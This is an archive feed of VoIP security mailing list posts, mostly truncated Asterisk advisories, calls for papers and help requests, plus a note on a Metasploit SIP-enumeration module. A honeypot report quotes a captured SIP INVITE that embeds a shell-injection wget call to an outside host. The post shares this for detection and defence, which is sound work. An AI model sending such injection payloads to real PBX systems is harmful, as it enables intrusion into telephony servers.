http://blog.gmane.org/gmane.comp.voip.security.voipsa hourly 1 1901-01-01T00:00+00:00 http://gmane.org/img/gmane-25t.png http://gmane.org http://comments.gmane.org/gmane.comp.voip.security.voipsa/3153 <pre>To whom it may concern: I'm in need of a job, can anyone help me find employment in Illinois? </pre> LaFron Aldridge 2012-05-03T16:58:54 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3141 <pre>Hi all, for anyone interested in future voip security related stuff, i would suggest to join the IETF Rtcweb mailing lists, as in recent months there are very challenging discussion on Security of WebRTC standard (Encrypted VoIP embedded in all future browsers). Subscription on https://www.ietf.org/mailman/listinfo/rtcweb -naif </pre> Fabio Pietrosanti (naif 2012-05-02T20:47:38 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3123 <pre>VOIPSEC readers, Just testing the list as the archives do not appear to be working for the list. (And hey, giving you all a reminder that you are still on this list! :-) Regards, Dan </pre> Dan York 2012-05-02T15:37:44 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3122 <pre> Asterisk Project Security Advisory - AST-2012-005 Product Asterisk Summary Heap Buffer Overflow in Skinny Channel Driver Nature of Advisory Exploitable Heap Buffer Overflow Susceptibility Remote Authenticated Sessions Severity Minor Exploits Known No Reported On March 26, 2012 Reported By Russell Bryant Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description In the Skinny channel driver, KEYPAD_BUTTON</pre> Asterisk Security Team 2012-04-23T18:25:30 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3121 <pre> Asterisk Project Security Advisory - AST-2012-006 Product Asterisk Summary Remote Crash Vulnerability in SIP Channel Driver Nature of Advisory Remote Crash Susceptibility Remote Authenticated Sessions Severity Moderate Exploits Known No Reported On April 16, 2012 Reported By Thomas Arimont Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description A remotely exploitable crash vulnerability </pre> Asterisk Security Team 2012-04-23T18:25:34 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3120 <pre> Asterisk Project Security Advisory - AST-2012-004 Product Asterisk Summary Asterisk Manager User Unauthorized Shell Access Nature of Advisory Permission Escalation Susceptibility Remote Authenticated Sessions Severity Minor Exploits Known No Reported On February 23, 2011 Reported By David Woolley Posted On April 23, 2012 Last Updated On April 23, 2012 Advisory Contact Jonathan Rose &lt; jrose AT digium DOT com &gt; CVE Name Description A user of the Asterisk Manager Interface ca</pre> Asterisk Security Team 2012-04-23T18:25:22 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3119 <pre>How to Configure the New Call Blocking Asterisk Collector http://www.humbuglabs.org/blog/2012/03/20/how-to-configure-the-new-call-blocking-asterisk-collector/ Humbug Telecom Labs has released the Silver Hawk version of our collector for Asterisk based systems This new collector enables companies running Asterisk version 1.4 (or later) to benefit from Humbug’s fraud blocking service. The blocking is currently available for the following alerts: For Asterisk version 1.4 and up: - Business Hours - Time Range For Asterisk versions 1.6 and up: - Blacklist - Community Blacklist - Blacklist Country We will be expanding to cover all our alerts in the near future. For more details about the features in the latest release please see our blog about it &lt;http://www.humbuglabs.org/blog/2012/02/26/introducing-the-silver-hawk/&gt;. Essentially, when a call is made from the PBX, the humbug plug-in authenticates the call against the configured rules of these alerts, and if a deviation is found then it d</pre> Eric Klein 2012-03-21T12:27:48 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3118 <pre> Asterisk Project Security Advisory - AST-2012-003 Product Asterisk Summary Stack Buffer Overflow in HTTP Manager Nature of Advisory Exploitable Stack Buffer Overflow Susceptibility Remote Unauthenticated Sessions Severity Critical Exploits Known No Reported On 03/15/2012 Reported By Russell Bryant Posted On 03/15/2012 Last Updated On March 15, 2012 Advisory Contact Matt Jordan &lt; mjordan AT digium DOT com &gt; CVE Name Description An attacker attempting to connect to an HTT</pre> Asterisk Security Team 2012-03-15T22:05:33 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3117 <pre> Asterisk Project Security Advisory - AST-2012-002 Product Asterisk Summary Remote Crash Vulnerability in Milliwatt Application Nature of Advisory Exploitable Stack Buffer Overflow with locally defined data Susceptibility Remote Unauthenticated Sessions Severity Minor Exploits Known No Reported On 03/14/2012 Reported By Russell Bryant Posted On 03/15/2012 Last Updated On March 15, 2012 Advisory Contact Matt Jordan &lt;mjordan AT digium DOT com&gt; </pre> Asterisk Security Team 2012-03-15T22:04:45 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3113 <pre>A Metasploit module is attached that demonstrates how to enumerate Asterisk sip peers that have a nat setting different to the global sip nat setting as described in Asterisk Security Advisory AST-2011-013. The example below finds all peers with nat=yes, but the metasploit module will also work when global nat=yes and peers have nat=no. Vulnerability discovered and exploit created by Ben Williams. References: http://downloads.asterisk.org/pub/security/AST-2011-013.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597 Example sip.conf: [general] context=default alwaysauthreject = yes [1000] nat=yes type=peer secret=12345cdsf0sd9r2e9 callerid=John Doe &lt;1000&gt; host=dynamic context=trusted [1001] nat=yes secret=12345 type=peer host=dynamic [1002] secret=12345a type=peer host=dynamic # svn co https://www.metasploit.com/svn/framework3/trunk/ # cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/ # cd trunk # msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM</pre> Ben Williams 2011-12-22T19:23:27 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3112 <pre>[CFP] FRHACK Africa 2012 Call For Papers ,. . :%%%. .%%%. __%%%(\ `%%%%% .%%%%% /a ^ '% %%%% %: ,% %%"` '__.. ,'% .-%: %-' % ~~""%:. ` % ' . `. %% % ` %% .%: . \. %%:. `-' ` .%% . %: :\ %(%,%..." `%, %%' %% ) ) %)%%)%%' )%%%.....- ' "/ ( %a:f%%\ % / \`% "%%% ` / \)) %(%' % /-. \ ' \ |-. '. `' |% `() \| `() || / () / () 0 | o \ /\ o / o ` /-| ,-/ ` ,-/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + FRHACK Africa + Call For Papers + June 1-2, 2012, Casablanca, Morocco, Africa + http://www.frhack.org +++++++++++++++++++++++++++++++++++++++++++++++++++++++</pre> Jerome Athias 2011-12-10T13:29:54 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3111 <pre> Asterisk Project Security Advisory - AST-2011-014 Product Asterisk Summary Remote crash possibility with SIP and the "automon" feature enabled Nature of Advisory Remote crash vulnerability in a feature that is disabled by default Susceptibility Remote unauthenticated sessions Severity Moderate Exploits Known Yes Reported On November 2, 2011 Reported By Kristijan Vrban Posted On 2011-11-03 Last Updated On December 7, 2011 Advi</pre> Asterisk Security Team 2011-12-08T22:48:55 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3110 <pre> Asterisk Project Security Advisory - AST-2011-013 Product Asterisk Summary Possible remote enumeration of SIP endpoints with differing NAT settings Nature of Advisory Unauthorized data disclosure Susceptibility Remote unauthenticated sessions Severity Minor Exploits Known Yes Reported On 2011-07-18 Reported By Ben Williams Posted On Last Updated On December 7, 2011 Advisory Contact Terry Wilson &lt;twilson&lt; at &gt;digium.com&gt; CVE Name Description It is possible to en</pre> Asterisk Security Team 2011-12-08T22:47:42 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3109 <pre>So after a dozen years or so organizing conferences, you get the urge to pull levers and try experimenting with things. So this year I sent out the CanSecWest CFP only over Twitter, and G+ publicly. Just curious as to the adoption and information dispersion rate, and some estimate of the attention these newer channels are getting. So after this experiment I hear about people having submissions and missing  the CFP. So for my control set, here is the normal announce message to different e-mail lists. We'll do a Second CanSecWest CFP, but a brief one. Send us your proposal by the end of Monday next week, December 5, 2011. The questions and information needed is the same as usual (see website), also for my curiosity could you include: 12. Where did you hear about the CFP from? cheers, --dr </pre> Dragos Ruiu 2011-11-30T02:04:38 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3108 <pre> Asterisk Project Security Advisory - AST-2011-012 Product Asterisk Summary Remote crash vulnerability in SIP channel driver Nature of Advisory Remote crash Susceptibility Remote authenticated sessions Severity Critical Exploits Known No Reported On October 4, 2011 Reported By Ehsan Foroughi Posted On October 17, 2011 Last Updated On October 17, 2011 Advisory Contact Terry Wilson &lt;twilson&lt; at &gt;digium.com&gt; CVE Name CVE-2011-4063 Desc</pre> Asterisk Security Team 2011-10-17T17:44:25 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3107 <pre>Hi Does anyone have any good resources for testing Mitel VOIP systems? I'm looking for anything from good practice installation guides through to tools to help attack phones or the call server. Anything anyone has got would be good. Robin </pre> Robin Wood 2011-10-08T18:35:45 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3105 <pre>Friends, The last weeks I've been trying to dive into the various SIP RFCs to get an overview of the TLS implementation and try to understand security aspects. It's really hard work, so I understand why so few implementors get there or when they do, do it right. SIPit is a bi-annual test event for SIP interoperability. The next event is in Monaco, Europe at the end of October this year. I will participate there and focus on VoIP security as well as IPv6. We have built some do-it-yourself testbeds and will continue with group tests in order to try to understand issues involved and where to go next. Customers need at least first hop TLS and SRTP to work as expected. They also need interoperability between devices. To get interoperability, everyone needs to work with it. It just doesn't happen by accident. SIPit has been organised twice a year for 15 years in order to get the amount of interoperability we have today in SIP. If you develop SIP software or devices - register for SIPit now. If you are a custome</pre> Olle E. Johansson 2011-09-30T09:00:36 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3104 <pre>Dear member of Voip SA, I need your help about test security on Ip-Telephony with Cisco Call Manager Rel 7, Ip-Phone 7940-7911, and Router Cisco 2800 series with 12.4 ios with 2 wic Bri Interface and 1wic xDSL interface. No firewall on the Fe0/1 and there are 2 Vlan: vlan Voice and Vlan Data. But despite this we have been a fraud from about 6000 euros. Could you help me about a tool test so I call the installer and I ask you to correct the problem? Thanks, reagards Paolo Digita il testo o l'indirizzo di un sito web oppure traduci un documento&lt;http://translate.google.it/?tr=f&amp;hl=it&gt; . Annulla &lt;http://translate.google.it/?tr=t&amp;hl=it&gt; Traduzione da italiano verso inglese </pre> Paolo Caramori 2011-09-18T10:42:03 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3096 <pre>Someone on the Asterisk mailing lists suggested I post this observation here. On my SIP honeypot, I saw a new (to my eyes) embedded shell injection scan as follows: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`&lt; at &gt;x.x.x.x SIP/2.0. I suspect that the 91.223.89.94 is strictly a web server being used to collect logs of vulnerable hosts (vulnerable to the shell injection as it parses the received URI). Someone SIP/PBX framework is probably vulnerable to that sort of shell injection and this scan is the collection process to identify hosts available for further shell injection attacks. the V.php appears to be a NOOP for the time being, hence my suggestion that it is strictly to populate a web server log with vulnerable hosts. </pre> Tom Browning 2011-09-12T14:19:09 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3095 <pre>Apologies for cross posting but some of us aren't on the other list (vice/versa) and thought both groups would benefit. For those familiar with the VoIP Abuse Project, no need to explain the gist of this. I got tired of parsing through the alerts (lists) I receive via email daily. They're long and sometimes I don't have the time to post them all. So for now, posting VoIP Abuse addresses straight to Twitter. So, anyone trying to compromise a pbx, is now autoposted on an hourly basis to Twitter. Still working on pulling, have about 4 machines linked up now, will mop em up during the week. http://twitter.com/#!/voipabuse Now, you can concoct a quick script off of it, e.g.: links -dump "http://twitter.com/voipabuse"|awk '/attacker/{print "iptables -A INPUT -s "$2" -j DROP"| "sort -u"}' Will get a quickie soon from my Acme's, nCites, etc. when I have time. For those NOT familiar with it, please Google it as I don't feel like typing anymore ;) (sorry) </pre> J. Oquendo 2011-08-22T20:25:06 http://comments.gmane.org/gmane.comp.voip.security.voipsa/3094 <pre>Hi, Is there tools to compare asterisk tls-srtp QoS compared to asterisk without it in large scale? maybe simulate lots of calls? Thank you, Arif </pre> arif setiawan 2011-08-11T04:14:41 Search the mailing list at Gmane query http://search.gmane.org/?group=$group=gmane.comp.voip.security.voipsa